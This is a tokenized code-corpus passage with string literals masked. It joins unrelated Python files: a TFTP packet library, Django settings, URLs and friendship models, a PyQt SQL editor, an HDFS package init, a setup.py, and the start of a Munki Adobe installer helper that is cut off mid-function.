<s> """<STR_LIT>""" <EOL> import struct <EOL> from TftpShared import * <EOL> class TftpSession ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class TftpPacketWithOptions ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . options = { } <EOL> def setoptions ( self , options ) : <EOL> log . debug ( "<STR_LIT>" ) <EOL> log . debug ( "<STR_LIT>" , str ( options ) ) <EOL> myoptions = { } <EOL> for key in options : <EOL> newkey = str ( key ) <EOL> myoptions [ newkey ] = str ( options [ key ] ) <EOL> log . debug ( "<STR_LIT>" , <EOL> newkey , myoptions [ newkey ] ) <EOL> log . debug ( "<STR_LIT>" , str ( myoptions ) ) <EOL> self . _options = myoptions <EOL> def getoptions ( self ) : <EOL> log . debug ( "<STR_LIT>" ) <EOL> return self . _options <EOL> options = property ( getoptions , setoptions ) <EOL> def decode_options ( self , buffer ) : <EOL> """<STR_LIT>""" <EOL> format = "<STR_LIT:!>" <EOL> options = { } <EOL> log . debug ( "<STR_LIT>" , repr ( buffer ) ) <EOL> log . debug ( "<STR_LIT>" , len ( buffer ) ) <EOL> if len ( buffer ) == <NUM_LIT:0> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> return { } <EOL> log . debug ( "<STR_LIT>" ) <EOL> length = <NUM_LIT:0> <EOL> for c in buffer : <EOL> if ord ( c ) == <NUM_LIT:0> : <EOL> log . debug ( "<STR_LIT>" , length ) <EOL> if length > <NUM_LIT:0> : <EOL> format += "<STR_LIT>" % length <EOL> length = - <NUM_LIT:1> <EOL> else : <EOL> raise TftpException , "<STR_LIT>" <EOL> length += <NUM_LIT:1> <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> mystruct = struct . unpack ( format , buffer ) <EOL> tftpassert ( len ( mystruct ) % <NUM_LIT:2> == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> for i in range ( <NUM_LIT:0> , len ( mystruct ) , <NUM_LIT:2> ) : <EOL> log . debug ( "<STR_LIT>" , mystruct [ i ] , mystruct [ i + <NUM_LIT:1> ] ) <EOL> options [ mystruct [ i ] ] = mystruct [ i + <NUM_LIT:1> ] <EOL> return options <EOL> class TftpPacket ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . opcode = <NUM_LIT:0> <EOL> self . buffer = None <EOL> def encode ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError , "<STR_LIT>" <EOL> def decode ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError , "<STR_LIT>" <EOL> class TftpPacketInitial ( TftpPacket , TftpPacketWithOptions ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> TftpPacketWithOptions . __init__ ( self ) <EOL> self . filename = None <EOL> self . mode = None <EOL> def encode ( self ) : <EOL> """<STR_LIT>""" <EOL> tftpassert ( self . filename , "<STR_LIT>" ) <EOL> tftpassert ( self . mode , "<STR_LIT>" ) <EOL> ptype = None <EOL> if self . opcode == <NUM_LIT:1> : ptype = "<STR_LIT>" <EOL> else : ptype = "<STR_LIT>" <EOL> log . debug ( "<STR_LIT>" , <EOL> ptype , self . filename , self . mode ) <EOL> for key in self . options : <EOL> log . debug ( "<STR_LIT>" , key , self . options [ key ] ) <EOL> format = "<STR_LIT>" <EOL> format += "<STR_LIT>" % len ( self . filename ) <EOL> if self . mode == "<STR_LIT>" : <EOL> format += "<STR_LIT>" <EOL> else : <EOL> raise AssertionError , "<STR_LIT>" % mode <EOL> options_list = [ ] <EOL> if self . options . keys ( ) > <NUM_LIT:0> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> for key in self . options : <EOL> format += "<STR_LIT>" % len ( key ) <EOL> options_list . append ( key ) <EOL> format += "<STR_LIT>" % len ( str ( self . options [ key ] ) ) <EOL> options_list . append ( str ( self . options [ key ] ) ) <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> log . debug ( "<STR_LIT>" , options_list ) <EOL> log . debug ( "<STR_LIT>" , struct . calcsize ( format ) ) <EOL> self . buffer = struct . pack ( format , <EOL> self . opcode , <EOL> self . filename , <EOL> self . mode , <EOL> * options_list ) <EOL> log . debug ( "<STR_LIT>" , repr ( self . buffer ) ) <EOL> return self <EOL> def decode ( self ) : <EOL> tftpassert ( self . buffer , "<STR_LIT>" ) <EOL> nulls = <NUM_LIT:0> <EOL> format = "<STR_LIT>" <EOL> nulls = length = tlength = <NUM_LIT:0> <EOL> log . debug ( "<STR_LIT>" ) <EOL> subbuf = self . buffer [ <NUM_LIT:2> : ] <EOL> for c in subbuf : <EOL> if ord ( c ) == <NUM_LIT:0> : <EOL> nulls += <NUM_LIT:1> <EOL> log . debug ( "<STR_LIT>" , length , nulls ) <EOL> format += "<STR_LIT>" % length <EOL> length = - <NUM_LIT:1> <EOL> if nulls == <NUM_LIT:2> : <EOL> break <EOL> length += <NUM_LIT:1> <EOL> tlength += <NUM_LIT:1> <EOL> log . debug ( "<STR_LIT>" , tlength ) <EOL> tftpassert ( nulls == <NUM_LIT:2> , "<STR_LIT>" ) <EOL> shortbuf = subbuf [ : tlength + <NUM_LIT:1> ] <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> log . debug ( "<STR_LIT>" , repr ( shortbuf ) ) <EOL> mystruct = struct . unpack ( format , shortbuf ) <EOL> tftpassert ( len ( mystruct ) == <NUM_LIT:2> , "<STR_LIT>" ) <EOL> self . filename = mystruct [ <NUM_LIT:0> ] <EOL> self . mode = mystruct [ <NUM_LIT:1> ] . lower ( ) <EOL> log . debug ( "<STR_LIT>" , self . filename ) <EOL> log . debug ( "<STR_LIT>" , self . mode ) <EOL> self . options = self . decode_options ( subbuf [ tlength + <NUM_LIT:1> : ] ) <EOL> return self <EOL> class TftpPacketRRQ ( TftpPacketInitial ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacketInitial . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:1> <EOL> def __str__ ( self ) : <EOL> s = '<STR_LIT>' % self . filename <EOL> s += '<STR_LIT>' % self . mode <EOL> if self . options : <EOL> s += '<STR_LIT>' % self . options <EOL> return s <EOL> class TftpPacketWRQ ( TftpPacketInitial ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacketInitial . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:2> <EOL> def __str__ ( self ) : <EOL> s = '<STR_LIT>' % self . filename <EOL> s += '<STR_LIT>' % self . mode <EOL> if self . options : <EOL> s += '<STR_LIT>' % self . options <EOL> return s <EOL> class TftpPacketDAT ( TftpPacket ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:3> <EOL> self . blocknumber = <NUM_LIT:0> <EOL> self . data = None <EOL> def __str__ ( self ) : <EOL> s = '<STR_LIT>' % self . blocknumber <EOL> if self . data : <EOL> s += '<STR_LIT>' % len ( self . data ) <EOL> return s <EOL> def encode ( self ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . data ) == <NUM_LIT:0> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> format = "<STR_LIT>" % len ( self . data ) <EOL> self . buffer = struct . pack ( format , <EOL> self . opcode , <EOL> self . blocknumber , <EOL> self . data ) <EOL> return self <EOL> def decode ( self ) : <EOL> """<STR_LIT>""" <EOL> ( self . blocknumber , ) = struct . unpack ( "<STR_LIT>" , self . buffer [ <NUM_LIT:2> : <NUM_LIT:4> ] ) <EOL> log . debug ( "<STR_LIT>" , self . blocknumber ) <EOL> log . debug ( "<STR_LIT>" , len ( self . buffer ) ) <EOL> self . data = self . buffer [ <NUM_LIT:4> : ] <EOL> log . debug ( "<STR_LIT>" , len ( self . data ) ) <EOL> return self <EOL> class TftpPacketACK ( TftpPacket ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:4> <EOL> self . blocknumber = <NUM_LIT:0> <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . blocknumber <EOL> def encode ( self ) : <EOL> log . debug ( "<STR_LIT>" , <EOL> self . opcode , self . blocknumber ) <EOL> self . buffer = struct . pack ( "<STR_LIT>" , self . opcode , self . blocknumber ) <EOL> return self <EOL> def decode ( self ) : <EOL> if len ( self . buffer ) > <NUM_LIT:4> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> log . debug ( "<STR_LIT>" , repr ( self . buffer ) ) <EOL> self . buffer = self . buffer [ <NUM_LIT:0> : <NUM_LIT:4> ] <EOL> self . opcode , self . blocknumber = struct . unpack ( "<STR_LIT>" , self . buffer ) <EOL> log . debug ( "<STR_LIT>" , <EOL> self . opcode , self . blocknumber ) <EOL> return self <EOL> class TftpPacketERR ( TftpPacket ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:5> <EOL> self . errorcode = <NUM_LIT:0> <EOL> self . errmsg = None <EOL> self . errmsgs = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" <EOL> } <EOL> def __str__ ( self ) : <EOL> s = '<STR_LIT>' % self . errorcode <EOL> s += '<STR_LIT>' % self . errmsgs . get ( self . errorcode , '<STR_LIT>' ) <EOL> return s <EOL> def encode ( self ) : <EOL> """<STR_LIT>""" <EOL> format = "<STR_LIT>" % len ( self . errmsgs [ self . errorcode ] ) <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> self . buffer = struct . pack ( format , <EOL> self . opcode , <EOL> self . errorcode , <EOL> self . errmsgs [ self . errorcode ] ) <EOL> return self <EOL> def decode ( self ) : <EOL> "<STR_LIT>" <EOL> buflen = len ( self . buffer ) <EOL> tftpassert ( buflen >= <NUM_LIT:4> , "<STR_LIT>" ) <EOL> log . debug ( "<STR_LIT>" , buflen ) <EOL> if buflen == <NUM_LIT:4> : <EOL> log . debug ( "<STR_LIT>" ) <EOL> format = "<STR_LIT>" <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> self . opcode , self . errorcode = struct . unpack ( format , <EOL> self . buffer ) <EOL> else : <EOL> log . debug ( "<STR_LIT>" ) <EOL> format = "<STR_LIT>" % ( len ( self . buffer ) - <NUM_LIT:5> ) <EOL> log . debug ( "<STR_LIT>" , format ) <EOL> self . opcode , self . errorcode , self . errmsg = struct . unpack ( format , <EOL> self . buffer ) <EOL> log . error ( "<STR_LIT>" <EOL> % ( self . errorcode , self . errmsg ) ) <EOL> return self <EOL> class TftpPacketOACK ( TftpPacket , TftpPacketWithOptions ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> TftpPacket . __init__ ( self ) <EOL> TftpPacketWithOptions . __init__ ( self ) <EOL> self . opcode = <NUM_LIT:6> <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . options <EOL> def encode ( self ) : <EOL> format = "<STR_LIT>" <EOL> options_list = [ ] <EOL> log . debug ( "<STR_LIT>" ) <EOL> for key in self . options : <EOL> log . debug ( "<STR_LIT>" , key ) <EOL> log . debug ( "<STR_LIT>" , self . options [ key ] ) <EOL> format += "<STR_LIT>" % len ( key ) <EOL> format += "<STR_LIT>" % len ( self . options [ key ] ) <EOL> options_list . append ( key ) <EOL> options_list . append ( self . options [ key ] ) <EOL> self . buffer = struct . pack ( format , self . opcode , * options_list ) <EOL> return self <EOL> def decode ( self ) : <EOL> self . options = self . decode_options ( self . buffer [ <NUM_LIT:2> : ] ) <EOL> return self <EOL> def match_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> for name in self . options : <EOL> if options . has_key ( name ) : <EOL> if name == '<STR_LIT>' : <EOL> size = int ( self . options [ name ] ) <EOL> if size >= MIN_BLKSIZE and size <= MAX_BLKSIZE : <EOL> log . debug ( "<STR_LIT>" , size ) <EOL> else : <EOL> raise TftpException , "<STR_LIT>" % size <EOL> elif name == '<STR_LIT>' : <EOL> size = int ( self . options [ name ] ) <EOL> if size < <NUM_LIT:0> : <EOL> raise TftpException , "<STR_LIT>" <EOL> else : <EOL> raise TftpException , "<STR_LIT>" % name <EOL> return True </s>
<s> import os <EOL> DIRNAME = os . path . dirname ( __file__ ) <EOL> DEBUG = True <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> SITE_ID = <NUM_LIT:1> <EOL> MEDIA_ROOT = DIRNAME + "<STR_LIT>" <EOL> MEDIA_URL = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( DIRNAME , "<STR_LIT>" ) , <EOL> ) <EOL> INSTALLED_APPS = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ] <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> SECRET_KEY = "<STR_LIT>" <EOL> POSTAL_ADDRESS_L10N = True </s>
<s> from django . conf . urls import * <EOL> urlpatterns = patterns ( "<STR_LIT>" , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> ) </s>
<s> from PyQt4 import QtGui <EOL> from PyQt4 import Qsci <EOL> from zipfile import ZipFile <EOL> from gzip import GzipFile <EOL> from bz2 import BZ2File <EOL> import codecs <EOL> class SQLEditor ( Qsci . QsciScintilla ) : <EOL> font = QtGui . QFont ( "<STR_LIT>" ) <EOL> def __init__ ( self , parent ) : <EOL> Qsci . QsciScintilla . __init__ ( self , parent ) <EOL> self . lexer = Qsci . QsciLexerSQL ( ) <EOL> self . lexer . setDefaultFont ( self . font ) <EOL> self . lexer . setFont ( self . font ) <EOL> self . setMarginsFont ( self . font ) <EOL> fgColor = QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) <EOL> bgColor = QtGui . QColor ( <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) <EOL> black = QtGui . QColor ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ) <EOL> comment = QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) <EOL> self . lexer . setDefaultColor ( fgColor ) <EOL> self . lexer . setColor ( fgColor , self . lexer . Default ) <EOL> self . lexer . setColor ( comment , self . lexer . Comment ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentLine ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentDoc ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . Number ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . Keyword ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . DoubleQuotedString ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . SingleQuotedString ) <EOL> self . lexer . setColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) , self . lexer . PlusKeyword ) <EOL> self . lexer . setColor ( fgColor , self . lexer . Operator ) <EOL> self . lexer . setColor ( fgColor , self . lexer . Identifier ) <EOL> self . lexer . setColor ( comment , self . lexer . PlusComment ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentLineHash ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentDocKeyword ) <EOL> self . lexer . setColor ( comment , self . lexer . CommentDocKeywordError ) <EOL> self . lexer . setPaper ( bgColor ) <EOL> self . lexer . setDefaultPaper ( bgColor ) <EOL> self . setCaretForegroundColor ( fgColor ) <EOL> self . setSelectionBackgroundColor ( black ) <EOL> self . setCaretLineVisible ( True ) <EOL> self . setCaretLineBackgroundColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) ) <EOL> self . setMarginsForegroundColor ( bgColor ) <EOL> self . setMarginsBackgroundColor ( black ) <EOL> self . setMatchedBraceForegroundColor ( fgColor ) <EOL> self . setMatchedBraceBackgroundColor ( QtGui . QColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) ) <EOL> self . setAutoIndent ( True ) <EOL> self . setFolding ( Qsci . QsciScintilla . NoFoldStyle ) <EOL> self . setWrapMode ( Qsci . QsciScintilla . WrapWord ) <EOL> self . setMarginWidth ( <NUM_LIT:0> , <NUM_LIT:30> ) <EOL> self . setMarginLineNumbers ( <NUM_LIT:0> , True ) <EOL> self . setBraceMatching ( self . SloppyBraceMatch ) <EOL> self . setLexer ( self . lexer ) <EOL> self . setUtf8 ( True ) <EOL> self . filename = None <EOL> def loadDialog ( self ) : <EOL> filename = QtGui . QFileDialog . getOpenFileName ( self , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if filename : <EOL> self . filename = filename <EOL> if self . filename . endswith ( "<STR_LIT>" ) : <EOL> opener = GzipFile <EOL> elif self . filename . endswith ( "<STR_LIT>" ) : <EOL> opener = BZ2File <EOL> elif self . filename . endswith ( "<STR_LIT>" ) : <EOL> opener = ZipFile <EOL> else : <EOL> opener = open <EOL> with codecs . EncodedFile ( opener ( self . filename , "<STR_LIT:r>" ) , "<STR_LIT:utf-8>" ) as f : <EOL> sql = f . read ( ) <EOL> self . setText ( sql ) <EOL> def saveAsDialog ( self ) : <EOL> filename = QtGui . QFileDialog . getSaveFileName ( self , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if filename : <EOL> self . filename = filename <EOL> self . saveQuery ( self . filename ) <EOL> def save ( self ) : <EOL> if not self . filename : <EOL> self . saveAsDialog ( ) <EOL> else : <EOL> self . saveQuery ( self . filename ) <EOL> def saveQuery ( self , filename ) : <EOL> if filename . endswith ( "<STR_LIT>" ) : <EOL> opener = GzipFile <EOL> elif filename . endswith ( "<STR_LIT>" ) : <EOL> opener = BZ2File <EOL> elif filename . endswith ( "<STR_LIT>" ) : <EOL> opener = ZipFile <EOL> else : <EOL> opener = open <EOL> with codecs . EncodedFile ( opener ( self . filename , "<STR_LIT:w>" ) , "<STR_LIT:utf-8>" ) as f : <EOL> f . write ( self . text ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from . client import Client , InsecureClient , TokenClient <EOL> from . config import Config , NullHandler <EOL> from . util import HdfsError <EOL> import logging as lg <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> lg . getLogger ( __name__ ) . addHandler ( NullHandler ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from . api import API <EOL> from . orm import ORM </s>
<s> try : <EOL> from setuptools . core import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> platforms = '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> from django . db import models <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . contrib . auth . models import User <EOL> import signals <EOL> class FriendshipRequest ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> from_user = models . ForeignKey ( User , related_name = "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> to_user = models . ForeignKey ( User , related_name = "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> message = models . CharField ( max_length = <NUM_LIT:200> , blank = True ) <EOL> """<STR_LIT>""" <EOL> created = models . DateTimeField ( default = datetime . datetime . now , <EOL> editable = False ) <EOL> """<STR_LIT>""" <EOL> accepted = models . BooleanField ( default = False ) <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> verbose_name = _ ( u'<STR_LIT>' ) <EOL> verbose_name_plural = _ ( u'<STR_LIT>' ) <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> def __unicode__ ( self ) : <EOL> return _ ( u'<STR_LIT>' ) % { <EOL> '<STR_LIT>' : unicode ( self . from_user ) , <EOL> '<STR_LIT>' : unicode ( self . to_user ) , <EOL> } <EOL> def accept ( self ) : <EOL> """<STR_LIT>""" <EOL> Friendship . objects . befriend ( self . from_user , self . to_user ) <EOL> self . accepted = True <EOL> self . save ( ) <EOL> signals . friendship_accepted . send ( sender = self ) <EOL> def decline ( self ) : <EOL> """<STR_LIT>""" <EOL> signals . friendship_declined . send ( sender = self ) <EOL> self . delete ( ) <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> signals . friendship_cancelled . send ( sender = self ) <EOL> self . delete ( ) <EOL> class FriendshipManager ( models . Manager ) : <EOL> def friends_of ( self , user , shuffle = False ) : <EOL> """<STR_LIT>""" <EOL> qs = User . objects . filter ( friendship__friends__user = user ) <EOL> if shuffle : <EOL> qs = qs . order_by ( '<STR_LIT:?>' ) <EOL> return qs <EOL> def are_friends ( self , user1 , user2 ) : <EOL> """<STR_LIT>""" <EOL> friendship = Friendship . objects . get ( user = user1 ) <EOL> return bool ( friendship . friends . filter ( user = user2 ) . exists ( ) ) <EOL> def befriend ( self , user1 , user2 ) : <EOL> """<STR_LIT>""" <EOL> friendship = Friendship . objects . get ( user = user1 ) <EOL> friendship . friends . add ( Friendship . objects . get ( user = user2 ) ) <EOL> FriendshipRequest . objects . filter ( from_user = user1 , <EOL> to_user = user2 ) . delete ( ) <EOL> def unfriend ( self , user1 , user2 ) : <EOL> """<STR_LIT>""" <EOL> friendship = Friendship . objects . get ( user = user1 ) <EOL> friendship . friends . remove ( Friendship . objects . get ( user = user2 ) ) <EOL> FriendshipRequest . objects . filter ( from_user = user1 , <EOL> to_user = user2 ) . delete ( ) <EOL> FriendshipRequest . objects . filter ( from_user = user2 , <EOL> to_user = user1 ) . delete ( ) <EOL> class Friendship ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> user = models . OneToOneField ( User , related_name = '<STR_LIT>' ) <EOL> """<STR_LIT>""" <EOL> friends = models . ManyToManyField ( '<STR_LIT>' , symmetrical = True ) <EOL> """<STR_LIT>""" <EOL> objects = FriendshipManager ( ) <EOL> class Meta : <EOL> verbose_name = _ ( u'<STR_LIT>' ) <EOL> verbose_name_plural = _ ( u'<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return _ ( u'<STR_LIT>' ) % { '<STR_LIT:user>' : unicode ( self . user ) } <EOL> def friend_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . friends . count ( ) <EOL> friend_count . short_description = _ ( u'<STR_LIT>' ) <EOL> def friend_summary ( self , count = <NUM_LIT:7> ) : <EOL> """<STR_LIT>""" <EOL> friend_list = self . friends . all ( ) . select_related ( depth = <NUM_LIT:1> ) [ : count ] <EOL> return u'<STR_LIT>' % ( u'<STR_LIT:U+002CU+0020>' . join ( unicode ( f . user ) for f in friend_list ) , <EOL> u'<STR_LIT>' if self . friend_count ( ) > count else u'<STR_LIT>' ) <EOL> friend_summary . short_description = _ ( u'<STR_LIT>' ) <EOL> class UserBlocks ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> user = models . OneToOneField ( User , related_name = '<STR_LIT>' ) <EOL> """<STR_LIT>""" <EOL> blocks = models . ManyToManyField ( User , related_name = '<STR_LIT>' ) <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> verbose_name = verbose_name_plural = _ ( u'<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return _ ( u'<STR_LIT>' ) % { '<STR_LIT:user>' : unicode ( self . user ) } <EOL> def block_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . blocks . count ( ) <EOL> block_count . short_description = _ ( u'<STR_LIT>' ) <EOL> def block_summary ( self , count = <NUM_LIT:7> ) : <EOL> """<STR_LIT>""" <EOL> block_list = self . blocks . all ( ) [ : count ] <EOL> return u'<STR_LIT>' % ( u'<STR_LIT:U+002CU+0020>' . join ( unicode ( user ) for user in block_list ) , <EOL> u'<STR_LIT>' if self . block_count ( ) > count else u'<STR_LIT>' ) <EOL> block_summary . short_description = _ ( u'<STR_LIT>' ) <EOL> models . signals . post_save . connect ( <EOL> signals . create_friendship_instance , <EOL> sender = User , <EOL> dispatch_uid = '<STR_LIT>' , <EOL> ) <EOL> models . signals . post_save . connect ( <EOL> signals . create_userblocks_instance , <EOL> sender = User , <EOL> dispatch_uid = '<STR_LIT>' , <EOL> ) </s>
<s> try : <EOL> from django . conf . urls import url <EOL> except ImportError : <EOL> from django . conf . urls . defaults import url <EOL> from . import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . trace , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . trace , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . tree , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . index , name = '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import subprocess <EOL> import time <EOL> import tempfile <EOL> import sqlite3 <EOL> from xml . dom import minidom <EOL> from glob import glob <EOL> import FoundationPlist <EOL> import munkicommon <EOL> import munkistatus <EOL> import utils <EOL> class AdobeInstallProgressMonitor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , kind = '<STR_LIT>' , operation = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> self . kind = kind <EOL> self . operation = operation <EOL> self . payload_count = { } <EOL> def get_current_log ( self ) : <EOL> '''<STR_LIT>''' <EOL> logpath = '<STR_LIT>' <EOL> proc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , logpath ] , <EOL> bufsize = - <NUM_LIT:1> , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> ( output , dummy_err ) = proc . communicate ( ) <EOL> if output : <EOL> firstitem = str ( output ) . splitlines ( ) [ <NUM_LIT:0> ] <EOL> if firstitem . endswith ( "<STR_LIT>" ) : <EOL> return os . path . join ( logpath , firstitem ) <EOL> return None <EOL> def info ( self ) : <EOL> '''<STR_LIT>''' <EOL> last_adobecode = "<STR_LIT>" <EOL> logfile = self . get_current_log ( ) <EOL> if logfile : <EOL> if self . kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> regex = r'<STR_LIT>' <EOL> elif self . kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if self . operation == '<STR_LIT>' : <EOL> regex = r'<STR_LIT>' <EOL> else : <EOL> regex = r'<STR_LIT>' <EOL> else : <EOL> if self . operation == '<STR_LIT>' : <EOL> regex = r'<STR_LIT>' <EOL> else : <EOL> regex = r'<STR_LIT>' <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , regex , logfile ] <EOL> proc = subprocess . Popen ( cmd , bufsize = - <NUM_LIT:1> , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> ( output , dummy_err ) = proc . communicate ( ) <EOL> if output : <EOL> lines = str ( output ) . splitlines ( ) <EOL> completed_payloads = len ( lines ) <EOL> if ( not logfile in self . payload_count <EOL> or completed_payloads > self . payload_count [ logfile ] ) : <EOL> self . payload_count [ logfile ] = completed_payloads <EOL> regex = re . compile ( r'<STR_LIT>' ) <EOL> lines . reverse ( ) <EOL> for line in lines : <EOL> m = regex . match ( line ) <EOL> try : <EOL> last_adobecode = m . group ( <NUM_LIT:1> ) <EOL> break <EOL> except ( IndexError , AttributeError ) : <EOL> pass <EOL> total_completed_payloads = <NUM_LIT:0> <EOL> for key in self . payload_count . keys ( ) : <EOL> total_completed_payloads += self . payload_count [ key ] <EOL> return ( total_completed_payloads , last_adobecode ) <EOL> def mountAdobeDmg ( dmgpath ) : <EOL> """<STR_LIT>""" <EOL> mountpoints = [ ] <EOL> dmgname = os . path . basename ( dmgpath ) <EOL> proc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , dmgpath , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> bufsize = - <NUM_LIT:1> , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> ( pliststr , err ) = proc . communicate ( ) <EOL> if err : <EOL> munkicommon . display_error ( 